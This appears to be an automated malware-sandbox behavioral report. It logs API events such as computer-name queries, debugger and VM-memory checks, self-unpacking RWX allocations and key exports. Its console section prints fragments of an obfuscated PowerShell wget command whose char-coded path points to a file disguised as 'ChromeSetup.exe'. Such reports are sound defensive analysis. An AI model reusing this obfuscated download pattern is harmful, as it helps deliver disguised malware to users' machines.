No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 20, 2023, 12:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2023, 12:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2023, 12:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2023, 12:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 20, 2023, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2023, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2023, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2023, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2023, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2023, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 20, 2023, 12:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2023, 12:17 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 20, 2023, 12:16 p.m.			0	0
IsDebuggerPresent July 20, 2023, 12:17 p.m.			0	0

Command line console output was observed (50 out of 169 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: At line:1 char:35 console_handle: 0x00000053	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [nEt.seRviCepOinTmanAGeR]:: <<<< SeCUrItYProtOcOl console_handle: 0x0000005f	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: = [Net.secURitypROTOCoLTYpe]::Tls12 console_handle: 0x0000006b	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: ; WgeT ([char] console_handle: 0x00000077	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [CHar] console_handle: 0x0000009b	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [cHar] console_handle: 0x000000bf	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [char] console_handle: 0x000000e3	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [chAR console_handle: 0x00000107	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [Char console_handle: 0x0000012b	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [CHAr console_handle: 0x0000014f	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [cHaR console_handle: 0x00000173	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [cHAr console_handle: 0x00000197	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [CHAR console_handle: 0x000001bb	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [cHAr console_handle: 0x000001df	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [chAR console_handle: 0x00000203	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [cHaR console_handle: 0x00000227	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [CHAR console_handle: 0x0000024b	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [Char console_handle: 0x0000026f	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [char console_handle: 0x00000293	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [cHaR console_handle: 0x000002b7	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [ChAR console_handle: 0x000002db	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [chaR console_handle: 0x000002ff	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [cHar console_handle: 0x00000323	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [chAr console_handle: 0x00000347	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [CHar console_handle: 0x0000036b	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [ChA console_handle: 0x0000038f	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: r] 101 console_handle: 0x0000039b	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [cH console_handle: 0x000003b3	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: aR] 115 console_handle: 0x000003bf	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: + [c console_handle: 0x000003d7	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: hAR] 116 console_handle: 0x000003e3	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: CHAr] 47 console_handle: 0x00000407	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: CHar] 67 console_handle: 0x0000042b	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: chAR] 104 console_handle: 0x0000044f	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: [char] 114 console_handle: 0x00000473	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: [ChaR] 111 console_handle: 0x00000497	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: [CHaR] 109 console_handle: 0x000004bb	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: [cHAr] 101 console_handle: 0x000004df	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: [cHar] 83 console_handle: 0x00000503	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: [ChAr] 101 console_handle: 0x00000527	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: [CHAR] 116 console_handle: 0x0000054b	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: [cHAR] 117 console_handle: 0x0000056f	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: [cHAR] 112 console_handle: 0x00000593	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: [CHaR] 46 console_handle: 0x000005b7	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: [chAR] 101 console_handle: 0x000005db	1	1
WriteConsoleW July 20, 2023, 12:17 p.m.	buffer: [chAR] 120 console_handle: 0x000005ff	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 93 events)

Time & API	Arguments	Status	Return
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ff6a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffe28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffe28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffe28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffe28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffe28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffe28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ff668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ff668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ff668 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ff268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fffa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ffee8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a20e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a27e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a27e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a27e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a2aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a2aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a2aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a2aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a2aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 20, 2023, 12:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a2aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 20, 2023, 12:16 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 277 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 20, 2023, 12:16 p.m.	process_identifier: 2640 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:16 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 20, 2023, 12:16 p.m.	process_identifier: 2640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:16 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 20, 2023, 12:16 p.m.	process_identifier: 2640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:16 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02931000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02932000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02716000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02717000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02718000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02719000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 20, 2023, 12:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
